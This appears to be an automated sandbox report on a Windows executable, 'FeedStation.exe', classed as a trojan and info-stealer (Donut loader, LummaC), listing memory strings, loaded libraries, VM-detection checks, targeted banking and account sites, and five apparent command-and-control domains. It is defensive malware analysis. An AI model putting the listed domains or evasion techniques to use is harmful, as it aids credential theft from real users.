Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: FeedStation.exe, 00000000.00000003.2332734644.000000000381A000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: FeedStation.exe, 00000000.00000003.2332537156.0000000003818000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332414351.000000000381B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49847 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\FeedStation.exe

Code function: 0_2_0252FC1A NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,

0_2_0252FC1A

Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E0765	0_2_024E0765
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0252FC1A	0_2_0252FC1A
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0250021C	0_2_0250021C
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0252B226	0_2_0252B226
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024F1239	0_2_024F1239
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_025152DD	0_2_025152DD
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0251F2F2	0_2_0251F2F2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024EE2E9	0_2_024EE2E9
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024FE282	0_2_024FE282
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024FA304	0_2_024FA304
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0252D3C2	0_2_0252D3C2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024EA3A2	0_2_024EA3A2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_02517062	0_2_02517062
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E0001	0_2_024E0001
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0250C00F	0_2_0250C00F
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_02516021	0_2_02516021
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024EB0E2	0_2_024EB0E2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024FD0B2	0_2_024FD0B2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_02506174	0_2_02506174
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0252C11A	0_2_0252C11A
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E81E2	0_2_024E81E2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024EA182	0_2_024EA182
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0251F662	0_2_0251F662
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_02517612	0_2_02517612
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024F762F	0_2_024F762F
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024FE692	0_2_024FE692
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024F8788	0_2_024F8788
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024EB7A4	0_2_024EB7A4
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024F3462	0_2_024F3462
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E54E2	0_2_024E54E2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0252C4EA	0_2_0252C4EA
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E74F2	0_2_024E74F2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_025185C2	0_2_025185C2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024EC5D2	0_2_024EC5D2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0250C588	0_2_0250C588
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024FAA42	0_2_024FAA42
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024F5AD2	0_2_024F5AD2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E4AE2	0_2_024E4AE2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024F2A85	0_2_024F2A85
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_02506AA2	0_2_02506AA2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024FEB92	0_2_024FEB92
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024FBB92	0_2_024FBB92
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024EE840	0_2_024EE840
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024EF852	0_2_024EF852
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0250C87A	0_2_0250C87A
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E6822	0_2_024E6822
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0250C88F	0_2_0250C88F
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0250D97A	0_2_0250D97A
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024F697D	0_2_024F697D
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_02504962	0_2_02504962
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_02517912	0_2_02517912
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_02502932	0_2_02502932
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0252C922	0_2_0252C922
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E79B2	0_2_024E79B2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_02516E02	0_2_02516E02
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0250CEC2	0_2_0250CEC2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E5E92	0_2_024E5E92
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0250CF4D	0_2_0250CF4D
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024F7F38	0_2_024F7F38
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0251EFD2	0_2_0251EFD2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E8FB2	0_2_024E8FB2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024FDFB2	0_2_024FDFB2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_02501C62	0_2_02501C62
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_02509C11	0_2_02509C11
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024EACA2	0_2_024EACA2
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024F8CBA	0_2_024F8CBA
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E7D52	0_2_024E7D52
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_0251ED02	0_2_0251ED02

Source: C:\Users\user\Desktop\FeedStation.exe	Code function: String function: 024E9AF2 appears 75 times
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: String function: 024F5AC2 appears 73 times

Source: FeedStation.exe

Static PE information: invalid certificate

Source: FeedStation.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2

Source: C:\Users\user\Desktop\FeedStation.exe

Code function: 0_2_024E0E75 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

0_2_024E0E75

Source: C:\Users\user\Desktop\FeedStation.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Users\user\Desktop\FeedStation.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FeedStation.exe, 00000000.00000003.2332999575.00000000037EB000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332816007.0000000003806000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FeedStation.exe	ReversingLabs: Detection: 55%
Source: FeedStation.exe	Virustotal: Detection: 63%

Source: C:\Users\user\Desktop\FeedStation.exe

File read: C:\Users\user\Desktop\FeedStation.exe

Jump to behavior

Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: FeedStation.exe

Static file information: File size 2000360 > 1048576

Source: FeedStation.exe

Static PE information: Raw size of CODE is bigger than: 0x100000 < 0x144800

Source: FeedStation.exe

Static PE information: real checksum: 0x19fee2 should be: 0x1e9ce3

Source: C:\Users\user\Desktop\FeedStation.exe

Code function: 0_2_0251D9D2 push eax; mov dword ptr [esp], 060504D3h

0_2_0251D9D3

Source: C:\Users\user\Desktop\FeedStation.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\FeedStation.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\FeedStation.exe TID: 3176	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\FeedStation.exe TID: 3176	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\FeedStation.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: FeedStation.exe, 00000000.00000003.2344100909.0000000003881000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2410786565.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: FeedStation.exe, 00000000.00000003.2410786565.00000000009F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: FeedStation.exe, 00000000.00000003.2344100909.0000000003881000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\FeedStation.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E0765 mov edx, dword ptr fs:[00000030h]	0_2_024E0765
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E0D25 mov eax, dword ptr fs:[00000030h]	0_2_024E0D25
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E1374 mov eax, dword ptr fs:[00000030h]	0_2_024E1374
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E1375 mov eax, dword ptr fs:[00000030h]	0_2_024E1375
Source: C:\Users\user\Desktop\FeedStation.exe	Code function: 0_2_024E10D5 mov eax, dword ptr fs:[00000030h]	0_2_024E10D5

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: FeedStation.exe	String found in binary or memory: debonairnukk.xyz
Source: FeedStation.exe	String found in binary or memory: diffuculttan.xyz
Source: FeedStation.exe	String found in binary or memory: effecterectz.xyz
Source: FeedStation.exe	String found in binary or memory: deafeninggeh.biz
Source: FeedStation.exe	String found in binary or memory: immureprech.biz

Source: C:\Users\user\Desktop\FeedStation.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\FeedStation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: FeedStation.exe, 00000000.00000003.2405509368.000000000385B000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2390070763.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2400418845.000000000385A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: FeedStation.exe, 00000000.00000003.2390118118.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fender\MsMpeng.exe

